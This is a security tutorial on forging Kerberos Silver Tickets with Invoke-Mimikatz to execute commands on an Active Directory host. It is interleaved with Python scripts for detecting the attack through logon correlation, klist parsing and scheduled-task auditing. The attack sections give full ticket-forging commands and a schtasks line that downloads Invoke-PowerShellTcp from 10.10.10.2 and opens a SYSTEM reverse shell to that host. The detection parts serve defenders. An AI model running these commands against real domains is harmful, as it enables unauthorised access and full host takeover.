
Kerberos: Achieving Command Execution using Silver Tickets

By Haboob Team

Table of Contents
1. Introduction, p. 2
2. What is a Silver Ticket?, p. 2
3. Attack Analysis, p. 3
4. Attack Requirements, p. 4
5. Attack Demonstration, p. 4
   A. Command Execution using PowerShell Remoting, p. 6
   B. Command Execution using Scheduled Tasks, p. 9
6. References, p. 11

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 1



1. Introduction
In this paper we discuss achieving command execution with Silver Tickets in an Active Directory environment. The technique relies on forging tickets for several specific SPNs and using them in a specific way to achieve command execution on any targeted machine. It can be used as a persistence or post-exploitation technique.

2. What is a Silver Ticket?

A Silver Ticket is a forged service authentication ticket, also called a Ticket Granting Service (TGS) ticket, forged with the key of the service account (which can be a computer account or a user account). As shown in the following graphics, since a Silver Ticket is a forged TGS, there is no communication with the Domain Controller (no AS-REQ/AS-REP and no TGS-REQ/TGS-REP) when a Silver Ticket is used. Silver Tickets are therefore harder to detect than Golden Tickets: there is no communication between the service and the DC, and any logging is local to the targeted computer. This makes the attack very useful as a persistence technique.

Figure 1: Normal Authentication in AD


Figure 2: The Silver Ticket process does not communicate with the DC
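The point made above, that a Silver Ticket never touches the DC and leaves only local logs, is exactly what a defender can correlate on. The following Python script is an added example and is not part of the original paper: it takes a member server's logon events (4624, logon type 3, authentication package Kerberos) and the domain controllers' TGS-request events (4769) and flags host logons for which no DC ever issued a service ticket. The event dictionaries and their values are constructed for the example; in practice they would come from the exported Security logs of the target host and of every DC in the domain.

```python
"""
Added example (not from the Haboob paper): correlate a member server's Kerberos
network logons (event 4624) with the domain controllers' TGS requests (event 4769).
Because a Silver Ticket is presented straight to the target host, the host records
a Kerberos logon for which no DC ever issued a service ticket.
"""
from datetime import datetime, timedelta

# Constructed sample events (field names follow the Windows Security log; values are made up).
SERVER2_LOGONS = [
    # normal: anyuser obtained a TGS for SERVER2$ from DC1 three seconds earlier
    {"time": "2020-06-01T10:00:05", "event_id": 4624, "logon_type": 3,
     "auth_package": "Kerberos", "target_user": "anyuser", "source_ip": "10.10.10.5"},
    # suspicious: no DC logged a 4769 for realdomainuser -> SERVER2$ (forged ticket, or a fake user)
    {"time": "2020-06-01T10:07:40", "event_id": 4624, "logon_type": 3,
     "auth_package": "Kerberos", "target_user": "realdomainuser", "source_ip": "10.10.10.5"},
    # NTLM logons are not covered by this check
    {"time": "2020-06-01T10:09:00", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "target_user": "svc_backup", "source_ip": "10.10.10.9"},
]

DC_TGS_REQUESTS = [
    {"time": "2020-06-01T10:00:02", "event_id": 4769,
     "account": "anyuser@HABOOBLAB.LOCAL", "service": "SERVER2$", "client_ip": "10.10.10.5"},
    {"time": "2020-06-01T09:58:10", "event_id": 4769,
     "account": "anyuser@HABOOBLAB.LOCAL", "service": "SERVER1$", "client_ip": "10.10.10.5"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def unmatched_kerberos_logons(host_events, dc_events, target_host, window=timedelta(hours=10)):
    """Return 4624 Kerberos network logons on target_host that have no 4769 on any DC
    for the same account and the host's computer account within `window` before the logon.
    The default window is the usual 10-hour maximum service-ticket lifetime, because a
    legitimately issued ticket may sit in the client's cache and be reused for that long."""
    host_acct = target_host.split(".")[0].rstrip("$").lower()
    issued = [
        (_ts(e["time"]), e["account"].split("@")[0].lower())
        for e in dc_events
        if e["event_id"] == 4769 and e["service"].rstrip("$").lower() == host_acct
    ]
    flagged = []
    for ev in host_events:
        if (ev["event_id"], ev["logon_type"], ev["auth_package"]) != (4624, 3, "Kerberos"):
            continue
        logon_time = _ts(ev["time"])
        user = ev["target_user"].lower()
        if not any(u == user and logon_time - window <= t <= logon_time for t, u in issued):
            flagged.append(ev)
    return flagged


if __name__ == "__main__":
    for ev in unmatched_kerberos_logons(SERVER2_LOGONS, DC_TGS_REQUESTS, "server2.habooblab.local"):
        print(f"{ev['time']} Kerberos logon by {ev['target_user']} from {ev['source_ip']} "
              "has no matching TGS request on any DC")
```

Two things matter when running this against real data: 4769 is written only on the DC that served the request, so the DC side must be the union of all DCs' logs, and a forged ticket for a non-existent user shows up here as well because that user can never have a 4769. The correlation is by account name only, which is deliberately loose; a stricter version would also require the 4769 client address to match the 4624 source address.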

3. Attack Analysis
Forging a Silver Ticket always requires a target service account, and the service must be available on the targeted machine (cifs, mssql, time, rpcss, etc.). In any Windows environment there are many ways to execute commands on a remote system; "remote" means we need a service to connect to, and then do what we connected for, such as command execution. Here are some examples of these service types:

• PowerShell Remoting
• Windows Management Instrumentation (WMI)
• Scheduled tasks (remotely)
• Windows Remote Management (WinRM)

Each of these methods needs one service or a couple of services to work. So, by using a Silver Ticket for those services, we can achieve command execution.


4. Attack Requirements
There are several requirements for carrying out this attack with Invoke-Mimikatz.ps1:

• The username to put in the forged ticket (it can be any fake user, but it is stealthier to use a real domain user).
• The domain's SID.
• The target server's FQDN.
• The SPN name of the service for which the TGS is to be created.
• The NTLM (RC4) hash of the targeted server account.

5. Attack Demonstration
In this section, we demonstrate the attack.

Assume that we obtained the NTLM (RC4) hash of our target server's account, server2$, during post-exploitation. We run the attack from server1.habooblab.local and try to achieve command execution on server2.habooblab.local.

First, we need to collect some information using PowerView.ps1 or the Active Directory PowerShell module. We have already compromised server1 and hold a domain user (anyuser) with local admin privileges on server1.

Figure 3: Local admin access on server1

Our current user (anyuser) has no privileges or access on the target server (server2).

Figure 4: Our current user has no access on server2

As mentioned earlier, we already have the NTLM (RC4) hash of the server2$ account, so we need the domain's SID to complete the attack requirements.

Figure 5: Domain SID

Now we need to choose the SPN name of the service for which the TGS is to be created. Keep in mind that this service must exist on the targeted server. The table below lists some service types with their service names; it is not exhaustive.

Service Type                                Service(s) to be used in the Silver Ticket
PowerShell Remoting                         HOST, HTTP (or WSMAN, RPCSS, depending on OS)
Windows Management Instrumentation (WMI)    HOST, RPCSS
Windows Remote Management (WinRM)           HOST, HTTP
Scheduled Tasks                             HOST

Now that we have all the required information, we can use Invoke-Mimikatz.ps1 to proceed with the attack.

The command we will use is:

Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid:S-1-5-21-1658214835-4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:SERVICEX /rc4:5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'


Here is an explanation of the Mimikatz command:

Command argument    Explanation
kerberos::golden    Name of the module used for Silver Tickets
/domain             Domain's FQDN
/sid                Domain's SID
/target             Target server's FQDN
/service            SPN name of the service for which the TGS is to be created
/rc4                Target server account's NTLM (RC4) hash
/user               Any domain user (a fake user also works)
/ptt                Pass the ticket into the current session instead of saving it to disk

A. Command Execution using PowerShell Remoting


As mentioned earlier, PowerShell Remoting uses a couple of services (HOST and HTTP, or WSMAN and RPCSS, depending on the OS), so we need to create a Silver Ticket for each of these services in order to use them against our target server (server2.habooblab.local).

The command for the HOST service is:

Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid:S-1-5-21-1658214835-4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:HOST /rc4:5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'

The command for the HTTP service is:

Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid:S-1-5-21-1658214835-4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:HTTP /rc4:5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'

Note that realdomainuser is a normal domain user with no access to the server2.habooblab.local server.

Here we forged two Silver Tickets, for the HOST and HTTP services, which PowerShell Remoting requires on the remote system (server2.habooblab.local).

Figure 6: HOST service ticket

And here is the HTTP service ticket; the klist output in Figure 8 shows the two injected tickets.

Figure 7: HTTP service ticket


Figure 8: klist shows the injected tickets in the current session

Now we can execute commands on server2.habooblab.local using Invoke-Command, which gives us the ability to run PowerShell commands on the remote system.

Figure 9: Command execution on server2 using Invoke-Command after using the host tickets
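The klist view in Figure 8 is something a defender can check automatically. The following Python script is an added example and is not part of the original paper: it parses klist output and flags service tickets whose client principal differs from the logged-on user, that record no KDC, or that are RC4-encrypted while the session's tickets are otherwise AES. The sample output is constructed to match the scenario above (anyuser's session on server1 holding a forged HOST ticket for server2 issued in the name of realdomainuser); the field layout follows what klist prints on current Windows versions, and the assumption that an injected ticket shows an empty "Kdc Called" field follows from the fact that no KDC was ever contacted for it.

```python
"""
Added example (not from the Haboob paper): parse `klist` output and flag service
tickets that look injected into the session rather than issued by a KDC.
"""
import re

# Constructed klist output: anyuser's TGT, a normal cifs ticket for server1, and a forged
# HOST ticket for server2 that names a different client, uses RC4 and records no KDC.
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7a1

Cached Tickets: (3)

#0>     Client: anyuser @ HABOOBLAB.LOCAL
        Server: krbtgt/HABOOBLAB.LOCAL @ HABOOBLAB.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 6/1/2020 9:55:12 (local)
        End Time:   6/1/2020 19:55:12 (local)
        Renew Time: 6/8/2020 9:55:12 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.habooblab.local

#1>     Client: anyuser @ HABOOBLAB.LOCAL
        Server: cifs/server1.habooblab.local @ HABOOBLAB.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 6/1/2020 9:55:12 (local)
        End Time:   6/1/2020 19:55:12 (local)
        Renew Time: 6/8/2020 9:55:12 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.habooblab.local

#2>     Client: realdomainuser @ HABOOBLAB.LOCAL
        Server: HOST/SERVER2.HABOOBLAB.LOCAL @ HABOOBLAB.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 6/1/2020 10:07:00 (local)
        End Time:   6/1/2020 20:07:00 (local)
        Renew Time: 6/8/2020 10:07:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
"""

TICKET_START = re.compile(r"^\s*#\d+>")
FIELD = re.compile(
    r"^\s*(?:#\d+>\s*)?(Client|Server|KerbTicket Encryption Type|Session Key Type|Kdc Called):\s*(.*?)\s*$"
)


def parse_klist(text):
    """Split klist output into one dict per cached ticket (only the fields we inspect)."""
    tickets, current = [], None
    for line in text.splitlines():
        if TICKET_START.match(line):
            current = {}
            tickets.append(current)
        if current is None:
            continue
        m = FIELD.match(line)
        if m:
            current[m.group(1)] = m.group(2)
    return tickets


def suspicious_tickets(tickets, session_user):
    """Return (server, reasons) for service tickets that do not look KDC-issued to session_user."""
    findings = []
    for t in tickets:
        server = t.get("Server", "")
        if server.lower().startswith("krbtgt/"):
            continue  # the TGT itself; Silver Tickets are service tickets
        reasons = []
        client = t.get("Client", "").split("@")[0].strip().lower()
        if client != session_user.lower():
            reasons.append("client principal differs from the logged-on user")
        if not t.get("Kdc Called"):
            reasons.append("no KDC recorded for the ticket")
        if "RC4" in t.get("KerbTicket Encryption Type", "").upper():
            reasons.append("RC4-encrypted service ticket")
        if reasons:
            findings.append((server, reasons))
    return findings


if __name__ == "__main__":
    for server, reasons in suspicious_tickets(parse_klist(SAMPLE_KLIST), "anyuser"):
        print(f"{server}: {'; '.join(reasons)}")
```

The RC4 check only carries weight in a domain whose accounts are AES-enabled, which is the common case today; the client-name mismatch is the stronger signal in this scenario because a legitimately obtained service ticket is always issued to the principal that holds the TGT.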


B. Command Execution using Scheduled Tasks


This works like the PowerShell Remoting case, but here we need to create a Silver Ticket for one service only, HOST, so that we can schedule a task with SYSTEM privileges on server2.habooblab.local.

The command for the HOST service is:

Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid:S-1-5-21-1658214835-4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:HOST /rc4:5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'

Here we injected the HOST ticket into our session using Invoke-Mimikatz.ps1, as we did for PowerShell Remoting.

Figure 10: HOST ticket used for Scheduled Tasks

Now we can schedule a task to run on the remote server (server2.habooblab.local) with SYSTEM privileges. Here the task runs a PowerShell command that gives us a reverse shell using Invoke-PowerShellTcp.ps1.

This command schedules the task on server2.habooblab.local:

schtasks /create /S server2.habooblab.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "pwntask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.2/Invoke-PowerShellTcp.ps1''');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.2 -Port 443'"

This command runs the scheduled task on the remote server (server2.habooblab.local):

schtasks /Run /S server2.habooblab.local /TN "pwntask"

Figure 11: Scheduling the task and running it on the remote target server2.habooblab.local

Figure 12: Reverse shell on server2 with SYSTEM privileges after running the task from server1
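On the target, the schtasks call above is recorded by Task Scheduler auditing as Security event 4698 ("A scheduled task was created"), whose TaskContent field carries the task's XML definition. The following Python script is an added example and is not part of the original paper: it parses that XML and flags tasks that run as SYSTEM (S-1-5-18) and launch a PowerShell download-and-execute cradle. Both events are constructed for the example; the first reproduces the pwntask definition from the scenario above and the second is a benign task for comparison. The XML element names and namespace are those of the Task Scheduler schema; the surrounding event dictionary is a simplified stand-in for the real event record.

```python
"""
Added example (not from the Haboob paper): inspect 'scheduled task created' events
(Security event 4698) and flag tasks that run as SYSTEM and launch a PowerShell
download cradle, which is what the schtasks command in the paper produces on server2.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
SYSTEM_SID = "S-1-5-18"
CRADLE_MARKERS = ("downloadstring", "downloadfile", "iex ", "invoke-expression")

# Constructed 4698 events. TaskContent mirrors the XML Task Scheduler writes; the task
# name, principal and arguments of the first one come from the paper's scenario.
PWNTASK_4698 = {
    "event_id": 4698, "computer": "server2.habooblab.local",
    "subject_user": "realdomainuser", "task_name": "\\pwntask",
    "task_content": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.2/Invoke-PowerShellTcp.ps1''');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.2 -Port 443'</Arguments>
    </Exec>
  </Actions>
</Task>""",
}

BACKUP_4698 = {  # benign comparison task (constructed)
    "event_id": 4698, "computer": "server2.habooblab.local",
    "subject_user": "svc_backup", "task_name": "\\Nightly Backup",
    "task_content": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author"><UserId>HABOOBLAB\\svc_backup</UserId><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\\Backup\\backup.cmd</Command></Exec>
  </Actions>
</Task>""",
}


def assess_task_creation(event):
    """Return the task's principal, command line and the reasons it deserves review."""
    # expat rejects a UTF-16 declaration on str input, so drop the XML declaration first
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", event["task_content"]).strip()
    root = ET.fromstring(xml_text)
    user_id = root.findtext(f"{TASK_NS}Principals/{TASK_NS}Principal/{TASK_NS}UserId", default="")
    exec_node = root.find(f".//{TASK_NS}Exec")
    command = exec_node.findtext(f"{TASK_NS}Command", default="") if exec_node is not None else ""
    arguments = exec_node.findtext(f"{TASK_NS}Arguments", default="") if exec_node is not None else ""

    reasons = []
    if user_id.upper() == SYSTEM_SID:
        reasons.append("runs as SYSTEM")
    if "powershell" in command.lower():
        reasons.append("PowerShell action")
    if any(marker in arguments.lower() for marker in CRADLE_MARKERS):
        reasons.append("download-and-execute cradle in arguments")
    return {
        "task_name": event["task_name"], "created_by": event["subject_user"],
        "run_as": user_id, "command_line": f"{command} {arguments}".strip(), "reasons": reasons,
    }


if __name__ == "__main__":
    for ev in (PWNTASK_4698, BACKUP_4698):
        result = assess_task_creation(ev)
        verdict = "; ".join(result["reasons"]) or "nothing unusual"
        print(f"{result['task_name']} by {result['created_by']} as {result['run_as']}: {verdict}")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled on the member server, so that policy needs to be in place before this check has anything to read; the creating account (realdomainuser here) is the identity from the forged ticket, which ties the task back to the logon-correlation check from section 2.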

Finally, the same approach can be used with the other services, such as WMI and WinRM. Keep in mind that some services give more than command execution: the LDAP service, for example, allows you to gain and use DCSync rights.


6. References
[1] https://adsecurity.org/?page_id=183
[2] https://adsecurity.org/?p=2011
[3] https://www.varonis.com/blog/kerberos-attack-silver-ticket/
[4] https://en.hackndo.com/kerberos-silver-golden-tickets/
[5] https://www.varonis.com/blog/kerberos-authentication-explained/
